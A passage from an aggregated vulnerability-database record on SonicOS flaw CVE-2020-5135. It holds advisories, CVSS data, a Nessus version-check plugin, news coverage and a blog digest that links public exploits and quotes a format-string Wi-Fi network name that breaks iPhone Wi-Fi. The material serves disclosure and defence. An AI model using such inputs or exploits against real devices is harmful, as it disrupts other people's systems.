"cvelist": ["CVE-2020-5135"], "modified": "2020-11-19T10:00:48", "id": "SECURELIST:100DB957ACFED2B9DC6D860183E5B88F", "href": "https://securelist.com/apt-predictions-for-2021/99387/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "A buffer overflow vulnerability in SonicOS allows a remote attacker to cause Denial of Service (DoS) and potentially execute arbitrary code by sending a malicious request to the firewall.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-15T00:00:00", "type": "cisa_kev", "title": "SonicWall SonicOS Buffer Overflow Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5135"], "modified": "2022-03-15T00:00:00", "id": "CISA-KEV-CVE-2020-5135", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ptsecurity": [{"lastseen": "2021-10-22T10:43:23", "description": "# PT-2020-29: Denial of service and potential arbitrary code execution in SonicOS\n\nSonicOS, SonicOSv \n\n**Severity:**\n\nSeverity level: High \nImpact: Denial of service and potential arbitrary code execution in SonicOS \nAccess Vector: Remote\n\nCVSS v3.0 \nBase Score: 9,4 \nVector: (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H) \nCVE-2020-5135\n\n**Vulnerability description:**\n\nThe vulnerability, which is associated with buffer overflow in SonicOS, allows a remote attacker to cause a denial of service (DoS) and potentially execute arbitrary code.\n\n**Advisory status:**\n\n26.06.2020 - Vendor notification date \n12.10.2020 - Security advisory publication date (<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0010>) \n\n**Credits:**\n\nThe vulnerability was discovered by Nikita Abramov, Positive Research Center (Positive Technologies Company)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-26T00:00:00", "type": "ptsecurity", "title": "PT-2020-29: Denial of service and potential arbitrary code execution in SonicOS", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5135"], "modified": "2020-12-10T00:00:00", "id": "PT-2020-29", "href": "https://www.ptsecurity.com/ww-en/analytics/threatscape/pt-2020-29/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2022-12-21T14:38:39", "description": "According to its self-reported version, the remote SonicWall firewall is running a version of SonicOS that is affected by a buffer overflow vulnerability, allowing a remote attacker to cause Denial of Service (DoS), and potentially execute arbitrary code by sending a malicious request to the firewall. This vulnerability affected SonicOS Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-10-16T00:00:00", "type": "nessus", "title": "SonicWall SonicOS Buffer Overflow Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:sonicwall:sonicos"], "id": "SONICWALL_SNWLID-2020-0010.NASL", "href": "https://www.tenable.com/plugins/nessus/141474", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141474);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-5135\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/05\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0127\");\n\n script_name(english:\"SonicWall SonicOS Buffer Overflow Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a Buffer Overflow vulnerability, leading to Denial of Service, \nand potentially to Arbitrary Code Execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the remote SonicWall firewall is running a version of SonicOS that is affected\nby a buffer overflow vulnerability, allowing a remote attacker to cause Denial of Service (DoS), \nand potentially execute arbitrary code by sending a malicious request to the firewall. \nThis vulnerability affected SonicOS Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v \nand Gen 7 version 7.0.0.0.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n # https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c667b9f5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in the vendor security advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-5135\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sonicwall:sonicos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\");\n script_require_keys(\"Host/OS\");\n\n exit(0);\n}\n\nos = get_kb_item_or_exit(\"Host/OS\");\nif (os !~ \"^SonicOS\" ) audit(AUDIT_OS_NOT, \"SonicWall SonicOS\");\n\n# SonicOS Enhanced 6.0.5.3-94o on a SonicWALL NSA 220\nmatch = pregmatch(pattern:\"^SonicOS(?: Enhanced)? (([0-9.]+)(-[^ ]*)?) on a SonicWALL\", string:os);\nif (isnull(match)) exit(1, \"Failed to identify the version of SonicOS.\");\nversion = match[1];\n\nfix = NULL;\n\n\nif (version =~ \"^6\\.\")\n{\n # SonicOS 6.0.5.3-93o and earlier\n # fixex in SonicOS 6.0.5.3-94o\n if (version =~ \"^6\\.0\\.5\\.3-([0-8]?[0-9]|9[0-3])o\")\n fix = \"6.0.5.3-94o\"; \n # SonicOS 6.5.1.11-4n and earlier\n # fixed in SonicOS 6.5.1.12-1n\n else if (version =~ \"^6\\.5\\.1\\.11-\\d+n\")\n fix = \"SonicOS 6.5.1.12-1n\";\n # SonicOS 6.5.4.7-79n and earlier\n # fixed in SonicOS 6.5.4.7-83n\n else if (version =~ \"^6\\.5\\.4\\.7-[0-7]?[0-9]n\")\n fix = \"6.5.4.7-83n\";\n # SonicOSv 6.5.4.4-44v-21-794 and earlier\n # fixed in SonicOS 6.5.4.v-21s-987\n # XXX not sure how I can check for this version,\n # as version and fix formats look different\n #else if (version =~ \"^6\\.5\\.4\\.4\")\n # fix = \"6.5.4.v-21s-987\";\n}\n# SonicOS 7.0.0.0-1\n# fixed in 7.0.0.0-2\nelse if (version =~ \"^7\\.0\\.0\\.0-[01]$\")\n{\n fix = \"7.0.0.0-2\";\n}\n\nif (isnull(fix))\n audit(AUDIT_DEVICE_NOT_VULN, \"SonicWALL \", \"SonicOS \" + version);\n#if (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\nelse\n{\n port = 0;\n report =\n '\\n Installed SonicOS version : ' + version +\n '\\n Fixed SonicOS version : ' + fix +\n '\\n';\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2022-08-14T18:45:21", "description": "A buffer overflow vulnerability in SonicOS allows a remote attacker to cause Denial of Service (DoS) and potentially execute arbitrary code by sending a malicious request to the firewall. This vulnerability affected SonicOS Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at October 15, 2020 10:48pm UTC reported:\n\nThere\u2019s high attacker value here if an attacker A) wants to cause a little mayhem, and/or B) can actually turn the DoS into reliable RCE. The first option is probably the likelier outcome in the immediate future. If [Positive Technologies](<https://twitter.com/ptswarm/status/1316838270538575877>) or Tripwire releases a PoC, the likelihood of broad exploitation probably rises significantly. For now, \u201cpatch fast but don\u2019t panic\u201d is good advice, as it always is with VPNs. There\u2019s full analysis for this bug in the [Rapid7 Analysis tab here](<https://attackerkb.com/topics/WzuBknGmx1/cve-2020-5135#rapid7-analysis>).\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-12T00:00:00", "type": "attackerkb", "title": "CVE-2020-5135", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-28T00:00:00", "id": "AKB:1C1E9FA5-A4DB-4CE8-8770-2431CE166358", "href": "https://attackerkb.com/topics/WzuBknGmx1/cve-2020-5135", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-09-03T05:31:24", "description": "A buffer overflow vulnerability in SonicOS allows a remote attacker to cause Denial of Service (DoS) and potentially execute arbitrary code by sending a malicious request to the firewall. This vulnerability affected SonicOS Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-12T11:15:00", "type": "cve", "title": "CVE-2020-5135", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5135"], "modified": "2022-09-03T03:57:00", "cpe": ["cpe:/o:sonicwall:sonicos:7.0.0.0", "cpe:/o:sonicwall:sonicosv:6.5.4.4", "cpe:/o:sonicwall:sonicos:6.5.4.7", "cpe:/o:sonicwall:sonicos:6.5.1.11", "cpe:/o:sonicwall:sonicos:6.0.5.3"], "id": "CVE-2020-5135", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-5135", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:sonicwall:sonicos:7.0.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sonicosv:6.5.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sonicos:6.5.1.11:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sonicos:6.0.5.3:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sonicos:6.5.4.7:*:*:*:*:*:*:*"]}], "thn": [{"lastseen": "2022-05-09T12:37:55", "description": "[](<https://thehackernews.com/images/-SD858Cx0SIo/YNK2gCP0mWI/AAAAAAAAC9U/CUkLKG6oVs8GdJbW6x6S3s1PA6DZGLEFwCLcBGAsYHQ/s0/sonicwall-vpn-hacking.jpg>)\n\nA critical vulnerability in SonicWall VPN appliances that was believed to have been patched last year has been now found to be \"botched,\" with the company leaving a memory leak flaw unaddressed, until now, that could permit a remote attacker to gain access to sensitive information.\n\nThe shortcoming was rectified in an update rolled out to SonicOS on June 22. \n\nTracked as [CVE-2021-20019](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0006>) (CVSS score: 5.3), the vulnerability is the consequence of a memory leak when sending a specially-crafted unauthenticated HTTP request, culminating in information disclosure.\n\nIt's worth noting that SonicWall's decision to hold back the patch comes amid [multiple](<https://thehackernews.com/2021/02/hackers-exploiting-critical-zero-day.html>) [zero-day](<https://thehackernews.com/2021/04/3-zero-day-exploits-hit-sonicwall.html>) [disclosures](<https://thehackernews.com/2021/04/hackers-exploit-sonicwall-zero-day-bug.html>) affecting its remote access VPN and email security products that have been exploited in a series of in-the-wild attacks to deploy backdoors and a new strain of ransomware called FIVEHANDS.\n\nHowevere, there is no evidence that the flaw is being exploited in the wild.\n\n[](<https://thehackernews.com/images/-m0gO5jwXUhQ/YNLCVzXwu3I/AAAAAAAAC9c/uxaOtb-jqc4cX5OSKdFx5YV65cl6P_KwQCLcBGAsYHQ/s0/memory-dump.jpg>) \n--- \nMemory Dump PoC \n \n\"SonicWall physical and virtual firewalls running certain versions of SonicOS may contain a vulnerability where the HTTP server response leaks partial memory,\" SonicWall said in an [advisory](<https://www.sonicwall.com/support/product-notification/?sol_id=210621114540820>) published Tuesday. \"This can potentially lead to an internal sensitive data disclosure vulnerability.\"\n\nThe original flaw, identified as [CVE-2020-5135](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0010>) (CVSS score: 9.4), concerned a buffer overflow vulnerability in SonicOS that could allow a remote attacker to cause denial-of-service (DoS) and potentially execute arbitrary code by sending a malicious request to the firewall.\n\nWhile SonicWall rolled out a patch in October 2020, additional testing undertaken by cybersecurity firm Tripwire revealed a memory leak as a \"result of an improper fix for CVE-2020-5135,\" according to security researcher Craig Young, who reported the new issue to SonicWall on October 6, 2020.\n\n\"As a one- or two-line fix with minimal impact, I had expected that a patch would probably come out quickly but, fast-forward to March and I still had not heard back,\" Young [noted](<https://www.tripwire.com/state-of-security/featured/analyzing-sonicwalls-unsuccessful-fix-for-cve-2020-5135/>) in a write-up on Tuesday. \"I reconnected with their PSIRT on March 1, 2021 for an update, but ultimately it took until well into June before an advisory could be released.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-23T05:11:00", "type": "thn", "title": "SonicWall Left a VPN Flaw Partially Unpatched Amidst 0-Day Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5135", "CVE-2021-20019"], "modified": "2021-06-23T05:35:59", "id": "THN:D6FED8C7635FDB50C271368C9373B439", "href": "https://thehackernews.com/2021/06/sonicwall-left-vpn-flaw-partially.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "avleonov": [{"lastseen": "2021-07-28T14:34:07", "description": "Hello, today I want to experiment with a new format. I will be reading last week's news from my [@avleonovnews](<https://t.me/avleonovnews>) channel, which I found the most interesting. I do this mostly for myself, but if you like it too, then that would be great. Please subscribe to [my YouTube channel](<https://www.youtube.com/channel/UCSenC-btyVAexgSwvVtxQkg>) and my Telegram [@avleonovcom](<https://t.me/avleonovcom>).\n\nLet's start with some new public exploits.\n\n 1. Researchers at Positive Technologies [have dropped a proof-of-concept (PoC) exploit](<https://www.tenable.com/blog/cve-2020-3580-proof-of-concept-published-for-cisco-asa-flaw-patched-in-october>) on Twitter for a known cross-site scripting (XSS) vulnerability in the Cisco Adaptive Security Appliance (ASA) CVE-2020-3580. This flaw was patched in October. There are reports of researchers pursuing bug bounties using this exploit. Maybe you should do this too. Well, or at least ask your IT administrators if they have updated the ASA.\n 2. [F5 BIG-IQ VE Post-auth Remote Root RCE](<https://vulners.com/packetstorm/PACKETSTORM:163264>). BIG-IQ provides a single point of management for all your BIG-IP devices \u2014 whether they are on premises or in a public or private cloud. It was possible to execute commands with root privileges as an authenticated privileged user via command injection in easy-setup-test-connection. A good reason to check if you have this in the infrastructure. But of course the fact that this is Post-auth makes it less interesting.\n 3. [VMware vCenter 6.5 / 6.7 / 7.0 Remote Code Execution](<https://vulners.com/packetstorm/PACKETSTORM:163268>). From the description of the vulnerability that was published in February 2021. "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server." Therefore, if your IT colleagues have not patched vCenter since February, you can try to demonstrate how this vulnerability is exploited in practice.\n 4. [Solaris SunSSH 11.0 Remote Root](<https://vulners.com/packetstorm/PACKETSTORM:163232>). "CVE-2020-14871 is a critical pre-authentication (via SSH) stack-based buffer overflow vulnerability in the Pluggable Authentication Module (PAM) in Oracle Solaris. PAM is a dynamic authentication component that was integrated into Solaris back in 1997 as part of Solaris 2.6". If you are still using Solaris in your infrastructure, this is a great opportunity to try this exploit.\n 5. [Dlink DSL2750U - 'Reboot' Command Injection](<https://vulners.com/packetstorm/PACKETSTORM:163228>). There, in the exploit code, [there is a link to the full study](<https://github.com/HadiMed/firmware-analysis/tree/main/DSL-2750U%20\\(firmware%20version%201.6\\)>) that shows how the researcher, Mohammed Hadi, gains admin access to the router. This is interesting considering that this router model is quite popular and you can still buy such a router.\n 6. [It's 2021 and a printf format string in a wireless network's name can break iPhone Wi-Fi](<https://www.theregister.com/2021/06/21/wifi_ssid_flaw/>). On Friday, Carl Schou, a security researcher in Denmark, reported that his iPhone lost its Wi-Fi capability after attempting to connect to a Wi-Fi network named "%p%s%s%s%s%n". Fortunately, the damage appears not to be permanent. Apple iOS devices that lose Wi-Fi capability after being bitten by this bug can be restored via the General -> Reset -> Reset Network Settings menu option, which reverts network settings to their factory default. Not a very interesting vulnerability in terms of practical exploitation, but fun. Don't connect to unfamiliar Wi-Fi networks.\n\nNow let's see some interesting new vulnerabilities.\n\n 1. [Critical Palo Alto Cyber-Defense Bug Allows Remote \u2018War Room\u2019 Access](<https://threatpost.com/critical-palo-alto-bug-remote-war-room/167169/>). "A critical security bug in Palo Alto Networks\u2019 Cortex XSOAR could allow remote attackers to run commands and automations in the Cortex XSOAR War Room and to take other actions on the platform, without having to log in. Found internally by Palo Alto, the bug (CVE-2021-3044) is an improper-authorization vulnerability that \u201cenables a remote unauthenticated attacker with network access to the Cortex XSOAR server to perform unauthorized actions through the REST API,\u201d according to the security vendor\u2019s Tuesday advisory.\n 2. [Cisco HyperFlex HX Auth Handling Remote Command Execution](<https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution>). Cisco HyperFlex HX Data Platform is a high-performance, extensible distributed file system that supports multiple hypervisors with a wide range of enterprise-grade data management and optimization services. If you have this in use, pay attention.\n 3. "VMware has rolled out security updates to resolve a [critical flaw affecting Carbon Black App Control](<https://thehackernews.com/2021/06/critical-auth-bypass-bug-affects-vmware.html>) that could be exploited to bypass authentication and take control of vulnerable systems." Carbon Black Protection (Cb App Control), formerly Bit9, is an application control product that allows departments to monitor and control application execution on systems.\n 4. [NVIDIA Jetson Chipsets Found Vulnerable to High-severity Flaws](<https://thehackernews.com/2021/06/nvidia-jetson-chipsets-found-vulnerable.html>). The NVIDIA Jetson line consists of embedded Linux AI and computer vision compute modules and developer kits that primarily caters to AI-based computer vision applications and autonomous systems such as mobile robots and drones.\n 5. On June 22, SonicWall published an advisory (SNWLID-2021-0006) to address an [incomplete fix for a vulnerability in its operating system](<https://www.tenable.com/blog/cve-2021-20019-sonicwall-fixes-incomplete-patch-for-cve-2020-5135>), SonicOS, used in a variety of SonicWall network security devices, including their SSL VPNs.\n\nMalware:\n\n 1. Cybersecurity researchers are sounding the alarm bell over a new ransomware strain called ["DarkRadiation"](<https://thehackernews.com/2021/06/wormable-darkradiation-ransomware.html>) that's implemented entirely in Bash and targets Linux and Docker cloud containers, while banking on messaging service Telegram for command-and-control (C2) communications. "The ransomware is written in Bash script and targets Red Hat/CentOS and Debian Linux distributions," researchers from Trend Micro said in a report published last week. "The malware uses OpenSSL's AES algorithm with CBC mode to encrypt files in various directories. It also uses Telegram's API to send an infection status to the threat actor(s)."\n\nSome statistics for your presentations:\n\n 1. [ Time to patch increases significantly during pandemic](<https://www.computerweekly.com/news/252502887/Time-to-patch-increases-significantly-during-pandemic>). "Among some of the headline findings in the data was a sharp decrease in the frequency with which disclosed vulnerabilities are patched in under 24 hours \u2013 which dropped from 20% last year to 9.9% today \u2013 despite new vulnerabilities or zero-days being quickly exploited by malicious actors, as has been seen in many cases, even before disclosure. The survey also found that about 60% of organisations take more than 72 hours to patch, and more than 20% take over 30 days, giving malicious actors a wide-open window to take advantage of the disclosed vulnerabilities to get inside target networks, establish persistence, steal data, and drop malware or ransomware."\n 2. ['Set it and forget it' attitude to open-source software has become a major security problem, says Veracode](<https://www.theregister.com/2021/06/22/third_party_libraries_veracode/>). 92 per cent of the flaws discovered in third-party libraries could be fixed by simply updating to the latest version, with two-thirds of fixes being "minor and non-disruptive to the functionality of even the most complex software applications." The report also highlighted that a slim majority, 52 per cent, of developers claimed to have a formal process for the selection of third-party libraries, with a quarter saying they are either unsure or unaware of the existence of such a process, and that "security" is the third biggest concern when selecting a library \u2013 with "functionality" and "licensing" topping the leader board.\n\nPromising topic:\n\n 1. Google on Thursday [introduced a unified vulnerability schema for open source projects](<https://www.theregister.com/2021/06/24/google_security_fix/>), continuing its current campaign to shore up the security of open source software. A schema defines the structure of a database. It's a blueprint for the objects within the database and it informs how data can be queried and exchanged. As Google describes it, existing naming systems like the CPE Product Dictionary don't provide an easy way to automatically map a CVE vulnerability listing to a package name and a set of versions in a package manager. "With this schema we hope to define a format that all vulnerability databases can export." Well, let's keep an eye on this.\n\nWell, it would probably be worth ending with the words about John McAfee.\n\n[Anti-virus Pioneer John McAfee Found Dead in Spanish Prison Cell](<https://www.infosecurity-magazine.com/news/john-mcafee-found-dead-in-prison/>). I do not presume to say anything about the crimes of which he was accused. In any case, he was an information security legend and his whole life was cooler than any Hollywood blockbuster. I recommend watching videos on [his YouTube channel](<https://www.youtube.com/user/officialjohnmcafee>) about attack attribution and the current state of infrastructure security. He said some pretty unpopular things. And some of them are very interesting. The way it ended is of course very sad and tragic. RIP. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-06-28T10:59:53", "type": "avleonov", "title": "Last Week\u2019s Security news: Cisco ASA, BIG-IQ, vSphere, Solaris, Dlink, iPhone %s, DarkRadiation, Google schema, John McAfee", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14871", "CVE-2020-3580", "CVE-2020-5135", "CVE-2021-1497", "CVE-2021-20019", "CVE-2021-3044"], "modified": "2021-06-28T10:59:53", "id": "AVLEONOV:14D436977A1AFE4725A5CA01B44E33E9", "href": "http://feedproxy.google.com/~r/avleonov/~3/S3dBKHSK6BE/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2022-03-16T11:35:36", "description": "CISA has added 15 new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise. **Note:** to view the newly added vulnerabilities in the catalog, click on the arrow on the of the \"Date Added to Catalog\" column, which will sort by descending dates.\n\n**CVE ID** | **Vulnerability Name** | **Due Date** \n---|---|--- \nCVE-2020-5135 | SonicWall SonicOS Buffer Overflow Vulnerability | 4/5/2022 \nCVE-2019-1405 | Microsoft Windows UPnP Service Privilege Escalation Vulnerability | 4/5/2022 \nCVE-2019-1322 | Microsoft Windows Privilege Escalation Vulnerability | 4/5/2022 \nCVE-2019-1315 | Microsoft Windows Error Reporting Manager Privilege Escalation Vulnerability | 4/5/2022 \nCVE-2019-1253 | Microsoft Windows AppX Deployment Server Privilege Escalation Vulnerability | 4/5/2022 \nCVE-2019-1129 | Microsoft Windows AppXSVC Privilege Escalation Vulnerability | 4/5/2022 \nCVE-2019-1069 | Microsoft Task Scheduler Privilege Escalation Vulnerability | 4/5/2022 